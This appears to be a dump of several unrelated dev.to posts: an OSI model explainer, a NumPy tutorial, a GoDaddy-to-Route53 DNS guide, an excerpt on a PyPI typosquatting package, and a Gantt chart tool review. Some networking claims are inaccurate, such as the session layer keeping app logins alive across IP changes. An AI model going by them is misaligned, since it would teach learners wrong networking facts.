Today’s Internet uses a slightly altered OSI model called the [Transmission Control Protocol/Internet Protocol(TCP/IP)](https://www.avast.com/c-what-is-tcp-ip#:~:text=What%20does%20TCP%2FIP%20stand,network%20such%20as%20the%20internet.).
This TCP/IP model streamlines things by combining the top three OSI layers (Application, Presentation, and Session) into a single Application layer. It also merges the Data Link and Physical layers into a Network Access layer. In simpler terms, the TCP/IP model has four layers: Network Access, Internet, Transport, and Application.

Now, this streamlining does not mean that the tasks done by the Presentation Layer and the Session Layer are unimportant in this internet age; they just work a bit differently, and the next couple of sections will discuss this. The rest of the article will discuss the layers that make up the OSI model and the roles they play in network communication.
## The OSI model layers
The OSI model is split into seven layers, and these layers are:
**Physical Layer (Layer 1):**
The physical layer is the foundation of data communication in the OSI model, defining the hardware elements involved in the network. This layer handles the transmission and reception of raw bitstreams (1s and 0s) that make up digital information. Its primary function is to transmit this data stream over physical media like cables (coaxial, fiber optic) or wireless signals (Wi-Fi). Depending on the medium, the physical layer converts the data into electrical signals for cables or radio waves for wireless transmission.
**Data Link Layer (Layer 2):**
The data link layer is responsible for error-free data transfer between nodes within the same network via the physical layer. To put it simply, A better way to understand this is:
Hosts - devices on a network that send, receive, and process data, such as computers, servers, and smartphones - use an addressing scheme called [Internet Protocol(IP) addresses](https://www.fortinet.com/resources/cyberglossary/what-is-ip-address#:~:text=An%20Internet%20Protocol%20(IP)%20address,use%20the%20internet%20to%20communicate.) to identify each other; the layer 3 section will describe this phenomenon in more detail.
These IP addresses act like unique mailing addresses on the network, allowing hosts to send information to each other.
However, like with some deliveries, the sending host doesn't get the information sent to the receiving host on a one-way trip. They are little helpers on the way that help to send the information from one hop to another until it reaches the IP address of the receiving hosts.
And that’s where the data link layer comes in.
**Addressing and Devices:**
The data link layer utilizes a unique addressing scheme called the [Media Access Control (MAC) addresses](https://www.techtarget.com/searchnetworking/definition/MAC-address). These addresses are 48 bits long and typically displayed as a 12-digit hexadecimal number, like 00:1E:67:E4:CB:32. Every [Network Interface Card (NIC)](https://www.tutorialspoint.com/what-is-network-interface-card-nic) has a unique, pre-assigned MAC address.
Now, you might wonder how data actually gets from one device to another on the same network. This is where switches come in.
Switches act as traffic directors within a network. They connect multiple devices to their various ports. To facilitate efficient data sharing, switches maintain MAC address tables that map specific ports to the corresponding MAC addresses of the devices connected to them.
To populate these MAC address tables, switches use a learn, flood, and forward method:
- **Learn:** Whenever we try to send data in or over the network, the sending hosts add a header to the data that holds the source and destination IP address and MAC address so that the network devices know where to send the data.
So when a switch receives a data packet, it examines the source MAC address in the frame header and the port on which it arrived. It then updates the MAC address table to associate this MAC address with that specific port. This way, the switch learns the location of devices on the network as they communicate.
- **Flood (if necessary):** If the destination MAC address for the incoming frame isn't found in the table, the switch can't determine the recipient's location. In this case, the switch may flood the data frame out of all ports except the one it received it on. This ensures that the packet reaches the intended recipient, even if the switch hasn't yet learned the destination address. While flooding seems inefficient, it's a temporary measure until the switch learns the proper route.
- **Forward:** Once the switch learns the destination MAC address and its port (either from the initial frame or a response), it can efficiently forward future frames for that device to the correct port.
In summary, the data link layer facilitates hop-to-hop delivery. It does this with the help of an addressing scheme called MAC address and a layer 2 device called switches. Switches learn what MAC addresses are connected to specific ports using the learn, flood, and forward technique.
Now that this article has explained how data travels hop-by-hop within a local network, how does the internet ensure these hops ultimately lead to the correct final destination, potentially located far away? And how do network devices choose the most efficient route for these hops?
That's where the network layer comes in. It plays a crucial role in directing data packets across the ocean of networks, which is the Internet.
**Network Layer (Layer 3)**
The next layer in the OSI model is the Network Layer. This layer is responsible for ensuring end-to-end delivery of data between devices. It achieves this by using a unique addressing system called an IP address.
An IP address is a 32-bit number, typically written in four sections (octets) separated by periods. Each section ranges from 0 to 255. An example of an IP address is 192.168.1.1.
The Network Layer uses the receiving device's IP address to determine its location. Using this IP address, the network layer can determine if the target device is on the same local network (like your home network) or a different network somewhere on the Internet. This ability to identify network location relies on a technique called [subnetting](https://www.solarwinds.com/resources/it-glossary/subnetting).
Knowing the target network allows the Network Layer to choose the most efficient way to send data:
- **Same Network:** If the target device is on the same local network, the data is sent directly using a switch.
- **Different Network:** If the target device is on a different network, the data is sent through a switch first. The switch then forwards the data to a router. [Routers](https://www.cloudflare.com/learning/network-layer/what-is-a-router/#:~:text=is%20a%20router%3F-,A%20router%20is%20a%20device%20that%20connects%20two%20or%20more,use%20the%20same%20Internet%20connection.) are responsible for directing data across different networks, ultimately reaching the target device on the internet.
**Understanding Routers and ARP**
Routers act as intermediaries that connect different networks. They're similar to traditional hosts in that they have both IP and MAC addresses. However, unlike hosts, routers use this information specifically to route data packets to their intended destinations on the network.
To send data over a network, you need two types of addresses: the IP and MAC addresses. Finding the IP address is relatively easy; for a traditional host, you can obtain the IP address using systems like the [Domain Name System (DNS)](https://www.cloudflare.com/learning/dns/what-is-dns/).
A router’s IP address is typically configured along with the host's IP address during network setup. Here are some examples of other configurations you might set during network setup:
- **IP Address (IPv4)**: Unique identifier for the device on the network.
- **Subnet Mask**: Defines the network portion of the IP address.
- **Default Gateway**: The router's IP address, which acts as the gateway to the internet.
However, discovering the MAC address can be a little tricky. To find the MAC address of a particular host in a network, the sending host does the following:
- **Checking the ARP Cache**: When a device needs to send data to another device on the same network, it first checks its [Address Resolution Protocol (ARP)](https://www.fortinet.com/resources/cyberglossary/what-is-arp#:~:text=Address%20Resolution%20Protocol%20(ARP)%20is,%2Darea%20network%20(LAN).) cache. This cache is stores a list of known MAC addresses associated with their corresponding IP addresses. To see the ARP cache on your system, run:
```
arp -a
```

- **Sending an ARP Request (if not found)**: If the target device's IP address isn't found in the ARP cache, the sending device broadcasts an [ARP request](https://www.techtarget.com/searchnetworking/definition/Address-Resolution-Protocol-ARP) message on the network. This message essentially asks, "Who has the MAC address for [target device's IP address]?"
- **Receiving the MAC Address**: All devices on the network receive the ARP request, but only the intended device responds. This response includes the target device's MAC address and is sent directly back to the sender.
- **Updating the ARP Cache**: The sending device then updates its ARP cache with this new information. This allows the device to efficiently send future data packets directly to the target device without needing to repeat the ARP request.
With both the IP and MAC addresses in hand, the sending device can package the data into a frame and transmit it over the network.
Once your data has reached the receiving host, how do you ensure it is delivered to the correct application in the right format? This is the job of the transport layer.
**Transport Layer (Layer 4)**
This fourth OSI layer facilitates service-to-service delivery. If you are reading this article on your laptop or phone, you probably have multiple tabs open, all sending and receiving data to hosts continuously. How does this data stay isolated in their respective tabs? The transport layer achieves this using the ports addressing scheme.
You can think of ports as numbered doorways on a computer. Each application is assigned a specific port ranging from 0 to 65535 to send and receive data.
Here is a deeper look into how ports keep things organized on both the server and client side:
- **Servers**: Servers act like well-known businesses with fixed addresses. They listen for incoming requests on predefined ports. For example, web servers typically listen on port 80 (HTTP) or 443 (HTTPS). This allows clients (like your web browser) to find and connect to the desired service reliably.
- **Clients**: Unlike servers, clients choose random, temporary ports (called ephemeral ports) for their connections. This range is usually between 49152 and 65535. Choosing random ports helps avoid conflicts between apps trying to use the same port. It also adds an extra layer of security and allows a single device to make multiple connections simultaneously.
So, when a client wants to connect to a server, it sends its request to the server's IP address and its predefined port. The server then responds to the client's IP address and the temporary port used for the connection.
The transport layer also uses two main protocols to handle data delivery: the [Transmission Control Protocol (TCP)](https://www.fortinet.com/resources/cyberglossary/tcp-ip) and the [User Datagram Protocol (UDP)](https://www.fortinet.com/resources/cyberglossary/user-datagram-protocol-udp).
- **TCP (Transmission Control Protocol)**: TCP is ideal for data transmissions where data integrity is crucial. It ensures that data is ordered and guaranteed to arrive, making it suitable for file transfers, emails, and web browsing.
- **UDP (User Datagram Protocol)**: Conversely, UDP sends data without guaranteed delivery or order, making it ideal for situations where speed is more important than data integrity, such as online gaming and live streaming.
**Session Layer (Layer 5)**
The fifth layer of the OSI model, the session layer, is responsible for establishing, managing, and terminating communication sessions between applications on different devices. It ensures that sessions remain open while data is being exchanged and can close them once the communication is complete.
While this article mentioned that layers 5-7 (Session, Presentation, and Application) are somewhat compressed into a single layer in modern protocols like TCP/IP, there's a historical reason for this. In the past, personal computers weren't as common. People primarily used large, centralized computers called mainframes. Since these mainframes were shared by multiple users, the Session layer played a crucial role in efficiently managing these concurrent sessions.
However, with advancements in technology and the democratization of computers, the distinctions between these layers are becoming less significant.
Here's a real-world example of how the Session layer functions in today's world: When you connect to Wi-Fi at a restaurant or bar, your phone or laptop might receive a new IP address because it's on a different network. However, thanks to the Session layer, you don't need to log in again to your apps – your connection remains active.
The session layer enables session continuity, ensuring seamless and efficient communication for applications that require ongoing interactions.
**Presentation Layer (Layer 6):**
Next, on the OSI model, you have the presentation layer. This layer acts as a translator for network communication. It ensures that the data sent from one application (like your web browser) can be understood by another application on a different system.
This is especially important when two communicating devices are using different encoding methods. The presentation layer converts data formats, handles encryption and decryption, and manages compression and decompression. By ensuring data is presented in a readable format, this layer allows applications to interpret and use the information correctly.
**Application Layer (Layer 7):**
The application layer is the topmost layer of the OSI model, and it's the only layer that directly interacts with data from the user. It provides network services directly to user applications, facilitating tasks such as sending emails, retrieving web pages, and transferring files.
This layer is responsible for identifying communication partners, ensuring resource availability, and synchronizing communication. It also translates user data into a format suitable for network transmission and vice versa, breaking down data into bits (1s and 0s). Common protocols operating at this layer include [HTTP](https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http), [FTP,](https://www.fortinet.com/resources/cyberglossary/file-transfer-protocol-ftp-meaning) [SMTP](https://sendgrid.com/en-us/blog/what-is-an-smtp-server), and [DNS](https://www.cloudflare.com/learning/dns/what-is-dns/). The application layer ensures that network communication is user-friendly and accessible, enabling effective interaction with the network resource.
## Putting it Together: A Practical Example
Now that this article has established the basics, how do these components work together to exchange data in the real world?
Well, to start off, you must note that sending data through the Internet involves the data traveling down the seven layers of the OSI model on the sending device, from the Application layer to the Physical layer, and then up the seven layers on the receiving device.
To simulate how data exchange would happen through an OSI model, lets take the example of visiting a webpage.
## On the sending end
Visiting a webpage over the internet is largely just sending and receiving data. You send a request specifying the webpage you want to see, and in return, you receive the requested content.
Here is how the data transaction would work in an OSI model.
**Application layer (Layer 7)**
This journey starts at the Application layer when you type a website into your web browser and hit enter. In this layer, the browser uses the Domain Name System (DNS) protocol to get the website's IP address, facilitating end-to-end delivery.
DNS acts like a phonebook for the internet. It translates human-readable domain names like "google.com" into machine-readable IP addresses like "216.58.223.238" that computers use to connect to websites. This makes it much easier for people to remember and access websites. To learn how DNS works exactly, check out this article: [What is DNS?](https://aws.amazon.com/route53/what-is-dns/#:~:text=The%20Internet's%20DNS%20system%20works,These%20requests%20are%20called%20queries.)
Next, the application layer prepares a [Hypertext Transfer Protocol (HTTP)](https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http) or [Hypertext Transfer Protocol Secure (HTTPS)](https://www.cloudflare.com/learning/ssl/what-is-https) request to fetch the requested webpage.
This HTTP request includes a version type, a URL, a method, request headers, and an optional HTTP body.
**Presentation layer (Layer 6)**
The browser formats the HTTP request, so the server can interpret the request.
Additionally, this layer handles data encryption and compression if you're accessing a secure website (HTTPS). Encryption scrambles the data to protect it from prying eyes, while compression reduces the data size for faster transmission.
**Session Layer (Layer 5):**
The browser establishes a session with Google’s server. This layer manages the session creation, maintenance, and termination, ensuring a smooth back-and-forth flow of data.
For websites prioritizing security, like those with HTTPS in the address bar, the Session layer works hand-in-hand with protocols like [SSL (Secure Sockets Layer)](https://www.digicert.com/what-is-ssl-tls-and-https) or its more modern successor, [TLS (Transport Layer Security)](https://www.digicert.com/what-is-ssl-tls-and-https). These protocols create a secure encrypted tunnel to safeguard the data traveling between your browser and the server.
**Transport Layer (Layer 4):**
In this layer, the HTTP request is broken down into smaller, manageable segments. The browser relies on TCP to ensure these segments are delivered to the correct ports on the server anf that they all arrive safely and in the right order.
**Network Layer (Layer 3):**
The Network Layer breaks down the segments into smaller packets and adds header information to each packet, including the IP addresses of your computer, Host A, and the web server, Host B.
Using the IP address it got from DNS, Host A checks whether the receiving host, Host B, is on the same network. It also uses this IP address to determine the best route to send the packets across the Internet.
**Data Link Layer (Layer 2):**
The Data link layer (Layer 2) further breaks these packets into frames. These frames are encapsulated with a frame header that contains the MAC address of your Host A network’s card and Host B’s network interface. This layer ensures the packets are delivered correctly within your local network.
**How Layer 3 and Layer 2 will work together**
After adding the IP address layer to its data packet, Host A will determine whether both the sending and receiving hosts are on the same network. If they are not, Host A needs to send the data to its default gateway, which is a router.
Host A uses an ARP request to find the router's MAC address and stores the ARP mappings (IP address mapped to a MAC address) in an ARP cache. Once Host A finds the MAC address, it adds the MAC address layer to the further segmented data packets, which are data frames, and sends them to the next hop or node.
Typically, hosts are not directly connected to routers but to switches, which are then connected to a router.
When the data reaches the router, the layer 2 (MAC address) header is discarded, as this layer is not needed for the next hop, which has a different source and destination and thus would need a new layer 2 header.
The Internet is a web of interconnected networks, usually involving multiple connected routers. So, when Host A sends data to the router, the router forwards it to the next router until it reaches the router in Host B's network. To learn how routers send data to each other, check out this article, [How Routers facilitate communication](https://supervisorbullying.com/how-routers-facilitate-communication/).
So the data moves from one hop to another, discarding and re-adding layer 2 headers as needed until the data packet gets to the final router in Host B’s network.
The router in Host B's network will then send an ARP request to figure out Host B's MAC address and send the data to a switch in the network. The switch then sends the data to Host B, finally stripping the Layer 2 and Layer 3 headers.
**Physical Layer (Layer 1):**
Your network card converts the data packets into electrical signals to travel over a cable or radio waves for Wi-Fi.
## On the Receiving End
When the data reaches the receiving device (Host B), it goes back up the seven OSI model layers. Let's follow the journey of the data:
**Physical Layer (Layer 1):** The data arrives as electrical signals (for wired connections) or radio waves (for wireless connections) and is received by Host B's network interface card (NIC). The NIC converts these signals back into binary data.
**Data Link Layer (Layer 2):** The NIC processes the incoming frames. It checks the frame header for the MAC address to confirm it's the intended recipient. The frame header is then stripped off, and the remaining data is passed to the Network layer.
**Network Layer (Layer 3):** At this layer, the packets are examined to ensure they are addressed to Host B’s IP address. If the packet is for Host B, the network layer strips off the IP header and reassembles the fragments into the original segments.
The data is then passed up to the Transport layer.
**Transport Layer (Layer 4):** The Transport layer (typically using TCP) reassembles the segments into the original message. It checks for errors and ensures all data segments are correctly ordered.
Once reassembled, the data is passed to the Session layer.
**Session Layer (Layer 5):** This layer manages the session between the browser and the web server. It ensures the session remains open as long as data exchange is needed.
If the session uses SSL/TLS, it ensures that the data remains encrypted until it is passed to the Presentation layer.
**Presentation Layer (Layer 6):** If the data is encrypted (e.g., HTTPS), the Presentation layer decrypts it. This layer also handles any data formatting or translation needed to make the data understandable to the Application layer.
The formatted data is then passed to the Application layer.
**Application Layer (Layer 7):** The Application layer receives the HTTP response. The web browser processes the HTTP response, which contains the HTML, CSS, JavaScript, and other resources needed to render the webpage.
The browser then renders the webpage, displaying it to the user.
## Wrapping it up
The internet is a deeply interesting web of devices. As more people around the world have clever ideas and develop new smart devices, the internet becomes even more complex and diverse.
Despite their differences, the internet only works well because these diverse devices can communicate with each other. This is thanks to a standardized set of rules and regulations called protocols. No matter where your devices are located or what kind of devices they are, they can talk to each other across the vast ocean of the internet, understand each other, and exchange information. That, my friends, is the beauty of the OSI model.
As discussed extensively in this article, the OSI model is a seven-layered framework that acts like a translator for all these devices. Each layer has its own specific protocol, like a specialized language, that allows it to communicate with the layers above and below it. These protocols ensure that data is packaged correctly, addressed for its destination, and delivered efficiently.
| amaraiheanacho |
1,879,650 | NumPy for Beginners: Why You Should Rely on Numpy Arrays More | Table of content What is NumPy? Key Aspects of NumPy in Python Why You Should Use... | 0 | 2024-06-06T21:16:34 | https://dev.to/varshav/numpy-for-beginners-a-basic-guide-to-get-you-started-2eg8 | webdev, python, numpy, beginners | <!-- TOC start -->
### Table of content
- [What is NumPy?](#what-is-numpy)
* [Key Aspects of NumPy in Python](#key-aspects-of-numpy-in-python)
* [Why You Should Use NumPy](#why-you-should-use-numpy)
- [Installation](#installation)
- [Creating Arrays](#creating-arrays)
- [Array attributes](#array-attributes)
- [Basic Operations](#basic-operations)
- [Reshaping and Slicing](#reshaping-and-slicing)
- [Boolean Indexing and Filtering](#boolean-indexing-and-filtering)
- [Matrix Operations](#matrix-operations)
- [Random Numbers](#random-numbers)
- [Conclusion](#conclusion)
<!-- TOC end -->
<a name="what-is-numpy"></a>
### What is NumPy?

NumPy, short for Numerical Python, is a fundamental library for numerical and scientific computing in Python. It provides support for large, multi-dimensional arrays and matrices, along with a collection of high-level mathematical functions to operate on these arrays. NumPy serves as the foundation for many data science and machine learning libraries, making it an essential tool for data analysis and scientific research in Python.
<a name="key-aspects-of-numpy-in-python"></a>
#### Key Aspects of NumPy in Python
`Efficient Data Structures`: NumPy introduces efficient array structures, which are faster and more memory-efficient than Python lists. This is crucial for handling large data sets.
`Multi-Dimensional Arrays`: NumPy allows you to work with multi-dimensional arrays, enabling the representation of matrices and tensors. This is particularly useful in scientific computing.
`Element-Wise Operations`: NumPy simplifies element-wise mathematical operations on arrays, making it easy to perform calculations on entire data sets in one go.
`Random Number Generation`: It provides a wide range of functions for generating random numbers and random data, which is useful for simulations and statistical analysis.
`Integration with Other Libraries`: NumPy seamlessly integrates with other data science libraries like SciPy, Pandas, and Matplotlib, enhancing its utility in various domains.
`Performance Optimization`: NumPy functions are implemented in low-level languages like C and Fortran, which significantly boosts their performance. It's a go-to choice when speed is essential.
<a name="why-you-should-use-numpy"></a>
#### Why You Should Use NumPy
`Speed and Efficiency`: NumPy is designed to handle large arrays and matrices of numeric data. Its operations are faster than standard Python lists and loops because it uses optimized C and Fortran code under the hood.
`Consistency and Compatibility`: Many other scientific libraries (such as SciPy, Pandas, and scikit-learn) are built on top of NumPy. This means that learning NumPy will make it easier to understand and use these other tools.
`Ease of Use`: NumPy's syntax is clean and easy to understand, which makes it simple to perform complex numerical operations. Its array-oriented approach makes code more readable and concise.
`Community and Support`: NumPy has a large, active community of users and contributors. This means that you can find plenty of resources, tutorials, and documentation to help you learn and troubleshoot.
`Flexibility`: NumPy supports a wide range of numerical operations, from simple arithmetic to more complex linear algebra and statistical computations. This makes it a versatile tool for many different types of data analysis.
<a name="installation"></a>
### Installation
`Using pip`: Open your terminal or command prompt and run the following command:
```python
pip install numpy
```
`Using conda (if you're using the Anaconda distribution)`: Open your terminal or Anaconda Prompt and run:
```python
conda install numpy
```
- Verifying the Installation To verify that NumPy is installed correctly, you can try importing it in a Python script or in an interactive Python session:
```python
import numpy as np
print(np.__version__)
```
<a name="creating-arrays"></a>
### Creating Arrays
```python
import numpy as np
# here, the NumPy library is imported and assigned an alias np to make it easier to reference in the code.
# Creating a 1D array
array_1d = np.array([1, 2, 3, 4, 5])
print("1D Array:", array_1d)
# Output: 1D Array: [1 2 3 4 5]
# Creating a 2D array
array_2d = np.array([[1, 2, 3], [4, 5, 6]])
print("2D Array:\n", array_2d)
# Output: 2D Array:
# [[1 2 3]
# [4 5 6]]
# Creating arrays with zeros, ones, and a constant value
zeros = np.zeros((3, 3))
print("Zeros:\n", zeros)
# Output: Zeros:
# [[0. 0. 0.]
# [0. 0. 0.]
# [0. 0. 0.]]
ones = np.ones((2, 4))
print("Ones:\n", ones)
# Output: Ones:
# [[1. 1. 1. 1.]
# [1. 1. 1. 1.]]
constant = np.full((2, 2), 7)
print("Constant:\n", constant)
# Output: Constant:
# [[7 7]
# [7 7]]
# Creating an array with a range of values
range_array = np.arange(10)
print("Range Array:", range_array)
# Output: Range Array: [0 1 2 3 4 5 6 7 8 9]
range_step_array = np.arange(0, 10, 2)
print("Range with Step Array:", range_step_array)
# Output: Range with Step Array: [0 2 4 6 8]
# Creating an array with equally spaced values
linspace_array = np.linspace(0, 1, 5) # [0. , 0.25, 0.5 , 0.75, 1. ]
print("Linspace Array:", linspace_array)
# Output: Linspace Array: [0. 0.25 0.5 0.75 1. ]
```
<a name="array-attributes"></a>
### Array attributes
NumPy arrays have several useful attributes:
```python
arr_2d = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
print(arr_2d.ndim) # ndim : Represents the number of dimensions or "rank" of the array.
# output : 2
print(arr_2d.shape) # shape : Returns a tuple indicating the number of rows and columns in the array.
# Output : (3, 3)
print(arr_2d.size) # size: Provides the total number of elements in the array.
# Output : 9
```
<a name="basic-operations"></a>
### Basic Operations
```python
# Arithmetic operations
a = np.array([1, 2, 3, 4])
b = np.array([5, 6, 7, 8])
# Element-wise addition, subtraction, multiplication, and division
sum_array = a + b
print(sum_array)
# Output: [ 6 8 10 12]
diff_array = a - b
print(diff_array)
# Output: [-4 -4 -4 -4]
prod_array = a * b
print(prod_array)
# Output: [ 5 12 21 32]
quot_array = a / b
print(quot_array)
# Output: [0.2 0.33333333 0.42857143 0.5 ]
# Aggregation functions
mean_value = np.mean(a)
print(mean_value) # Output: 2.5
sum_value = np.sum(a)
print(sum_value) # Output: 10
min_value = np.min(a)
print(min_value) # Output: 1
max_value = np.max(a)
print(max_value) # Output: 4
```
<a name="reshaping-and-slicing"></a>
### Reshaping and Slicing
```python
# Reshaping arrays
array = np.arange(1, 13) # array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
reshaped_array = array.reshape((3, 4)) # 3x4 array
print(reshaped_array)
# Output: [[ 1 2 3 4]
# [ 5 6 7 8]
# [ 9 10 11 12]]
# Slicing arrays
array = np.array([1, 2, 3, 4, 5, 6])
slice_array = array[1:4]
print(slice_array)
# Output: [2 3 4]
slice_2d_array = reshaped_array[1, :] # Second row of the reshaped array
print(slice_2d_array)
# Output: [5 6 7 8]
```
<a name="boolean-indexing-and-filtering"></a>
### Boolean Indexing and Filtering
```python
# Boolean indexing
array = np.array([1, 2, 3, 4, 5, 6])
bool_index = array > 3
print(bool_index)
# Output: [False False False True True True]
filtered_array = array[bool_index]
print(filtered_array)
# Output: [4 5 6]
# Direct filtering
filtered_array_direct = array[array > 3]
print(filtered_array_direct)
# Output: [4 5 6]
```
<a name="matrix-operations"></a>
### Matrix Operations
```python
# Matrix multiplication
matrix_a = np.array([[1, 2], [3, 4]])
matrix_b = np.array([[5, 6], [7, 8]])
matrix_product = np.dot(matrix_a, matrix_b)
print(matrix_product)
# Output: [[19 22]
# [43 50]]
# Transpose of a matrix
transpose_matrix = matrix_a.T
print(transpose_matrix)
# Output: [[1 3]
# [2 4]]
# Inverse of a matrix
inverse_matrix = np.linalg.inv(matrix_a)
print(inverse_matrix)
# Output: [[-2. 1. ]
# [ 1.5 -0.5]]
```
<a name="random-numbers"></a>
### Random Numbers
```python
# Generating random numbers
random_array = np.random.random((2, 3)) # 2x3 array with random values between 0 and 1
random_int_array = np.random.randint(0, 10, (2, 3)) # 2x3 array with random integers between 0 and 9
```
<a name="conclusion"></a>
### Conclusion
NumPy is an essential library for anyone working with numerical data in Python. Its powerful features, such as efficient data structures, multi-dimensional arrays, and a wide range of mathematical functions, make it an indispensable tool for data analysis and scientific computing. By integrating seamlessly with other data science libraries and providing significant performance boosts, NumPy stands out as a critical component of the Python ecosystem. Whether you're new to Python or an experienced data scientist, learning NumPy will improve your ability to handle large datasets and perform complex calculations. Its active community and extensive documentation make it easy to learn and use.
This guide covers the basics of NumPy, and there's much more to explore. Visit [numpy.org](https://numpy.org/) for more information and examples.
If you have any questions, suggestions, or corrections, please feel free to leave a comment. Your feedback helps me improve and create more accurate content.
**Happy coding!!!**
_The cover picture was downloaded from [storyset](https://storyset.com/)_ | varshav |
1,877,542 | Managing your GoDaddy domain with Route53 | This post explains how to use AWS Route53 to manage your external domain, such as GoDaddy. Simply... | 0 | 2024-06-06T21:13:42 | https://dev.to/diegop0s/managing-your-godaddy-domain-with-route53-5f2p | dns, route53, godaddy, aws | This post explains how to use AWS Route53 to manage your external domain, such as GoDaddy. Simply follow these steps:
## Select your domain in GoDaddy

Verify the domain you own. The domain name is important, for example: **my-daddy-o.org**
## Create your Hosted Zone in Route53
Log in to the AWS Console and navigate to the Route53 service console. Then, go to the "Hosted Zone" section and click on "Create hosted zone".

Type your Domain name here (my-daddy-o.org) and select "Public" type.

After setting up your Hosted Zone, review the records and double-check the default NS and SOA records, especially the "NS" type record.


## Update your Nameservers on GoDaddy
Go to your GoDaddy domain, navigate to the "DNS" section, update the "Nameservers," and then click "Change".

In the new window, enter the values from your "NS" record in Route53. Be careful to not include the last dot. For example: `ns-777.awsdns-11.com.` → `ns-777.awsdns-11.com`

## Verify your domain
You can verify the complete application of your Name Server change by checking its propagation. This may take some time (minutes to hours). Use [whatsmydns](https://www.whatsmydns.net/#NS) to check for correct propagation.

## Validate a record
As an additional step, you need to create a new record on Route53 to validate its functionality.
In my case, I created an S3 Bucket to test a simple website. After configuring the bucket as a static website, I created a new record pointing to the website endpoint.
For this, I created a new record "www.my-daddy-o.org". Please verify that the URL resolves to your bucket.


| diegop0s |
1,879,649 | Rails and Postgres | I'm slowly grasping the connection between Rails and Postgres. I'm starting to feel like this is the... | 0 | 2024-06-06T21:10:09 | https://dev.to/brvarner/rails-and-postgres-5234 | rails, postgres | I'm slowly grasping the connection between Rails and Postgres. I'm starting to feel like this is the key to the Model-View-Controller system, but I'm still working on fully wrapping my head around this bad boy.
Luckily, I took copious notes during most Postgres/Rails lesson, and you can [read them here](https://github.com/brvarner/dpi-notes/blob/main/june5.md).
## Getting Started
You must first download [PostgreSQL](https://www.postgresql.org/), and follow the prompts to learn its console line commands.
You must start by initializing a database and then creating a table.
When you create a table, you must include the fields and data types that all of your entries will have. Here's an example from the exercise in the course, where we created a contact book:
```
CREATE TABLE contacts (
id SERIAL PRIMARY KEY,
first_name TEXT,
last_name TEXT,
date_of_birth DATE,
street_address_1 TEXT,
street_address_2 TEXT,
city TEXT,
state TEXT,
zip TEXT,
phone TEXT,
notes TEXT,
created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP
);
```
The id field will always be a SERIAL PRIMARY KEY to indicate it should auto-increment and that this will be the primary key of your table.
After creating your table, you can launch it to prime it for editing/access with the psql command, or by using rails db.
To link your Rails project with your database, you have to edit your `database.yaml` file. Change `rails_template_development` on line 27 to your database's name and it'll find it on your computer.
Also, you can access Rails' built-in database GUI by launching bin/server and navigating to `rails/db` in your project. From there, you can perform CRUD operations on data or observe.
### Models
You must interface with your database via a Model, which Rails provides as an easy way to structure your database actions. Models are Ruby classes that "talk to the database, store and validate data, perform the business logic, and otherwise do the heavy lifting".
These models inherit methods from Rails's built-in ActiveRecord class, which lets them do many different moves. Each model represents a single row of data, so they're named singularly after the name of the table (i.e. a model named Contact for a table named contacts). This naming convention helps Rails automatically locate the table that the model represents.
We can operate on the data several ways once we complete setup, but I'm calling it on Rails/Postgres until we do it next week as a class.
| brvarner |
1,879,648 | Identifying a typosquatting attack on "requests," the 4th-most-popular Python package | An attacker published a Python package to the PyPI (Python Package Index) registry named requestn, a... | 0 | 2024-06-06T21:01:46 | https://dev.to/stacey_potter_3de75e600a1/identifying-a-typosquatting-attack-on-requests-the-4th-most-popular-python-package-3cm2 | opensource, security, python, typosquatting | An attacker published a Python package to the PyPI (Python Package Index) registry named requestn, a name that's very similar to the very popular PyPI requests library. This user even tagged the same latest version of 8.0, so this was clearly a typosquatting attack.
[Trusty](https://www.trustypkg.dev/) is a free-to-use software supply chain security monitoring platform that gives you insight into the safety of your open source dependencies. Trusty looks for certain patterns such as the proof of origin / source provenance mapping of a codebase to a package; the activity of the project and its authors; and the advanced textual / binary analysis of a package contents to discover malware, CVEs, and malicious code.
It came to our attention earlier today that a 3-day-old account, "Dmitry2001," published a Python package to the PyPI (Python Package Index) registry named `requestn`, a name that's very similar to the very popular PyPI `requests` library. The [requests library](https://pypi.org/project/requests/) has more than 30 million downloads a week. It is a hugely popular library in Python that simplifies making HTTP requests to interact with web services.
Trusty's threat analysis system, developed by Stacklok, was able to interpret the `requestn` package as suspicious, due to its close proximity to the popular `requests` library...
Read the full article by Luis Juncal & Luke Hinds [here](https://stacklok.com/blog/identifying-a-typosquatting-attack-on-requests-the-4th-most-popular-python-package) | stacey_potter_3de75e600a1 |
1,876,327 | Top 10 Gantt Chart Tools for 2024 | What is a Gantt Chart and How to Use It A Gantt chart is a project management tool designed to help... | 0 | 2024-06-06T21:00:00 | https://dev.to/weeek/top-10-gantt-chart-tools-for-2024-24a9 | product, productivity, news, softwaredevelopment | What is a Gantt Chart and How to Use It
A Gantt chart is a project management tool designed to help organize and visualize personal or team projects.
##
**The chart aids in visualization and allows you to:**
Establish the order of task completion,
Estimate time and workload for each team member,
Highlight priorities and relationships between different stages,
Identify critical points that directly impact the project.
For personal use, it is an excellent self-management tool, and for team work, it acts as a lifeline. It helps manage tasks efficiently, clearly delineates projects, and accounts for each team member's working hours.
For guidance on how to create a Gantt chart and what to consider during the process, check out this recommended article. It's a great starting point if you're new to the topic.
Now, addressing one of the most popular queries, "Where can I create a Gantt chart?" let's dive into a selection of services. We'll briefly overview their main features and visual execution.
## **WEEEK**
Traditionally, we'll start with our planner. It's a comprehensive remote office where you can collaborate with your team, plan tasks, monitor their progress, and create Gantt charts. If you need a universal program, this is the place to go.
Available Plans for Gantt Chart Creation
Gantt charts are available on all plans, including the free one. However, it’s more convenient to use the chart starting from the Lite plan, where you can create extended tasks (from $3.99 per month per user).
**Interface Features**
Displays task and subtask names on the sidebar and the chart itself
Completed tasks are crossed out on the chart and marked with checkmarks on the sidebar
The chart shows the completion time, task dependencies, constraints, and dates
Additionally, the sidebar displays task priority (by color) and the executor's avatar
**Capabilities**
Quickly create and format tasks both on the chart and the sidebar
Make tasks private
Add additional materials, comment on tasks, and view change history
Set dependencies between tasks, block one task until another is completed
Move the timeline directly on the chart
Scale the display of tasks by days, weeks, and months
Change a subtask's status to a main task's status
Sort by priority, date, type, and estimated time
**Limitations / Not Yet Available**
No separate visualization for milestones (key project stages)
Task progress is not displayed on the chart
Task coloring is not yet available
Tasks cannot be manually moved on the sidebar (new tasks are created at the bottom)
